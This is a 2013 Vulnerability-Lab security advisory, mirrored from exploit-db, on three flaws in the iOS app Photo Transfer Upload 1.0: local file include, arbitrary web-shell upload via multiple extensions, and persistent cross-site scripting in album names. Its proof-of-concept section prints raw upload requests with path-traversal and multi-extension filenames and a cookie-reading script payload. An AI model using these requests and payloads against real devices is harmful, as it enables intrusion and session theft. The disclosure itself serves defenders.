Photo Transfer Upload 1.0 iOS – Multiple Vulnerabilities

  • 作者: Vulnerability-Lab
    日期: 2013-08-17
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/27656/
  • Title:
    ======
    Photo Transfer Upload v1.0 iOS - Multiple Vulnerabilities
    
    
    Date:
    =====
    2013-08-16
    
    
    References:
    ===========
    http://www.vulnerability-lab.com/get_content.php?id=1047
    
    
    VL-ID:
    =====
    1047
    
    
    Common Vulnerability Scoring System:
    ====================================
    8.6
    
    
    Introduction:
    =============
    Photo Transfer Access and transfer all your photos between your iPhone/iPad and PC/Mac without 3rd party transfer utilities.
    It can easily access your photo libraries via wifi from any computer with a web browser(IE/Chrome/Safari) on the same wifi 
    network, very easy to use!
    
    - Support drag & drop upload, easy to use
    - Transfer multiple photos and videos at once
    - Download photos and videos as zip archives
    - Crate new album
    - Password protection for the web access
    
    ( Copy of the Homepage: https://itunes.apple.com/us/app/photo-transfer-upload-download/id672205608 )
    
    
    Abstract:
    =========
    The Vulnerability Laboratory Research Team discovered a persistent vulnerability in the Photo Transfer Upload v1.0 application (Apple iOS - iPad & iPhone).
    
    
    Report-Timeline:
    ================
    2013-08-16:Public Disclosure (Vulnerability Laboratory)
    
    
    Status:
    ========
    Published
    
    
    Affected Products:
    ==================
    Apple AppStore
    Product: Photo Transfer Upload - Mobile Application 1.0
    
    
    Exploitation-Technique:
    =======================
    Remote
    
    
    Severity:
    =========
    Critical
    
    
    Details:
    ========
    1.1
    A local file/path include web vulnerability is detected in the Photo Transfer Upload v1.0 application (Apple iOS - iPad & iPhone).
    The file include vulnerability allows remote attackers to include (upload) local file or path requests to compromise the application or service.
    
    The vulnerability is located in the upload module when processing to upload files with manipulated filename values in the POST method request. 
    The attacker can inject local path or files to request context and compromise the mobile device or web service. The validation has a bad side 
    effect which impacts the risk to combine the attack with persistent injected script code.
    
    Exploitation of the local file include web vulnerability requires no user interaction or privilege application user account with password. 
    Successful exploitation of the vulnerability results in unauthorized local file and path requests to compromise the device or application.
    
    Vulnerable Application(s):
    				[+] Photo Transfer Upload v1.0 - ITunes or AppStore (Apple)
    
    Vulnerable Module(s):
    				[+] Upload (Files) - (http://localhost)
    
    Vulnerable Parameter(s):
    				[+] filename 
    
    Affected Module(s):
    				[+] Index File Dir Listing
    
    
    
    1.2
    An arbitrary file upload web vulnerability is detected in the Photo Transfer Upload v1.0 application (Apple iOS - iPad & iPhone).
    The arbitrary file upload issue allows a remote attacker to upload files with multiple extensions to bypass the validation for unauthorized access.
    
    The vulnerability is located in the upload module when processing to upload files with multiple ending extensions. Attackers are able to upload 
    a php or js web-shells by renaming the file with multiple extensions. The attacker uploads for example a web-shell with the following name and 
    extension image.jpg.js.php.jpg . The attacker needs to open the file in the web application and deletes the .jpg file extension to access the 
    picture with elevated access rights.
    
    Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privilege application user account with password.
    Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells.
    
    Vulnerable Application(s):
    				[+] Photo Transfer Upload v1.0 - ITunes or AppStore (Apple)
    
    Vulnerable Module(s):
    				[+] Upload (Files) - (http://localhost)
    
    Vulnerable Parameter(s):
    				[+] filename (multiple extensions)
    
    Affected Module(s):
    				[+] Index File Dir Listing
    
    
    1.3
    A persistent input validation web vulnerability is detected in the Photo Transfer Upload v1.0 application (Apple iOS - iPad & iPhone).
    The bug allows an attacker (remote) to implement/inject malicious own malicious persistent script codes (application side).
    
    The vulnerability is located in the `Add Photo Album` module of the web-server interface (http://localhost) when processing to 
    request via POST method manipulated `album names`. The album name will be changed to the path value without secure filter, 
    encode or parse mechanism. The injected script code will be executed in the main index file dir folder listing of the mobile application.
    
    Exploitation of the persistent web vulnerability requires low user interaction and no privilege application user account with a password. 
    Successful exploitation of the vulnerability can lead to persistent session hijacking (customers), account steal via persistent web attacks, 
    persistent phishing or persistent module context manipulation.
    
    Vulnerable Application(s):
    				[+] Photo Transfer Upload v1.0 - ITunes or AppStore (Apple)
    
    Vulnerable Module(s):
    				[+] Add Photo Album
    
    Vulnerable Parameter(s):
    				[+] Album Name
    
    Affected Module(s):
    				[+] Index Listing
    				[+] Sub Category Listing
    
    
    Proof of Concept:
    =================
    1.1
    The file/path include web vulnerability can be exploited by remote attackers without user interaction or 
    privilege application user account. For demonstration or reproduce ...
    
    
    --- POST --- (Upload #1)
    POSTDATA =-----------------------------144252594127308
    Content-Disposition: form-data; name="params"
    
    name:Camera%20Roll|url:95016B21-FEE4-43E5-802D-3891B9C6ACF4
    -----------------------------144252594127308
    Content-Disposition: form-data; name="newfile"; filename="><;../../var/mobile/x[FILE INCLUDE VULNERABILITY]"
    Content-Type: image/png
    ‰PNG
    -
    --- POST --- (LIST INDEX #1 #2)
    POSTDATA={"url":"ALL"}
    
    
    Note: After the file/path include the attacker can open the index module or sub category to execute the request.
    
    
    
    1.2
    The arbitrary file upload web vulnerability can be exploited by remote attackers without user interaction or 
    privilege application user account. For demonstration or reproduce ...
    
    
    --- POST --- (Upload #2)
    POSTDATA =-----------------------------144252594127308
    Content-Disposition: form-data; name="params"
    
    name:Camera%20Roll|url:95016B21-FEE4-43E5-802D-3891B9C6ACF4
    -----------------------------144252594127308
    Content-Disposition: form-data; name="newfile"; filename="pentester.jpg.html.js.php.asp.xml.jpg"
    Content-Type: image/png
    ‰PNG
    
    --- POST --- (LIST INDEX #1 #2)
    POSTDATA={"url":"ALL"}
    
    Note: After the file upload the attacker deletes the .jpg extension to access the injected webshell.
    
    
    
    1.3
    The persistent input validation web vulnerability can be exploited by remote attackers without privilege application user 
    account and also without user interaction. For demonstration or reproduce ...
    
    
    PoC:Index - Album Name
    
    <ul class="thumbnails" id="albums"><li class="album_warp"><a href="http://localhost/album.html?name=Camera%20Roll&
    url=assets-library://group/?id=D579B80C-B73D-4A16-9379-FB29A6CFC12C" class="thumbnail">
    <img src="https://www.exploit-db.com/exploits/27656/Photo%20Transfer_files/-1886868417.PNG" class="album_image"><h5 class="album_title">Camera Roll</h5>
    <p class="album_desc">11 Photos</p></a></li><li class="album_warp">
    <a href="http://localhost/album.html?name=%3E%22%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3Cdiv%20style=%222&
    url=assets-library://group/?id=68D6D844-02EB-45C9-AA9E-28255915C551" class="thumbnail"><img src="https://www.exploit-db.com/exploits/27656/Photo%20Transfer_files/placeholder.png" 
    class="album_image"></a><h5 class="album_title">
    <a href="http://localhost/album.html?name=%3E%22%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3Cdiv%20style=%222&
    url=assets-library://group/?id=68D6D844-02EB-45C9-AA9E-28255915C551" class="thumbnail">>"</a><div style="2</h5>
    <p class=" album_desc"=""><a href="http://localhost/album.html?name=%3E%22%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3Cdiv%20
    style=%222&url=assets-library://group/?id=68D6D844-02EB-45C9-AA9E-28255915C551" class="thumbnail">0 Photos<p></p></a></div></h5></li>
    <li class="album_warp"><a href="http://localhost/album.html?name=%3E%22%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3Cdiv%20style=%221&
    url=assets-library://group/?id=C5231091-88C7-40E9-8C73-47FBEA7EBB65" class="thumbnail"><img src="https://www.exploit-db.com/exploits/27656/Photo%20Transfer_files/placeholder.png" 
    class="album_image"></a><h5 class="album_title"><a href="http://localhost/album.html?name=%3E%22%3Cscript%3Ealert%28document.cookie%29%3C/
    script%3E%3Cdiv%20style=%221&url=assets-library://group/?id=C5231091-88C7-40E9-8C73-47FBEA7EBB65" class="thumbnail">>"</a>
    <div style="1</h5><p class=" album_desc"=""><a href="http://localhost/album.html?name=%3E%22%3Cscript%3Ealert%28document.cookie%29%3C/
    script%3E%3Cdiv%20style=%221&url=assets-library://group/?id=C5231091-88C7-40E9-8C73-47FBEA7EBB65" class="thumbnail">0 Photos<p>
    </p></a></div></h5></li></ul>
    
    
    Solution:
    =========
    The vulnerability can be patched by a secure encoding or escapewhen processing to add via POST method request folders with manipulated names.
    
    
    Risk:
    =====
    The security risk of the persistent input validation web vulnerability is estimated as medium(+).
    
    
    Credits:
    ========
    Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com)
    
    
    Disclaimer:
    ===========
    The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, 
    either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
    Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
    profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
    states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
    may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
    or trade with fraud/stolen material.
    
    Domains:www.vulnerability-lab.com 	- www.vuln-lab.com			 - www.evolution-sec.com
    Contact:admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	 - admin@evolution-sec.com
    Section:www.vulnerability-lab.com/dev 	- forum.vulnerability-db.com 		 - magazine.vulnerability-db.com
    Social:	twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	 - youtube.com/user/vulnerability0lab
    Feeds:	vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
    
    Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
    Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
    media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and 
    other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
    modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
    
    				Copyright © 2013 | Vulnerability Laboratory [Evolution Security]
    
    
    
    -- 
    VULNERABILITY LABORATORY RESEARCH TEAM
    DOMAIN: www.vulnerability-lab.com
    CONTACT: research@vulnerability-lab.com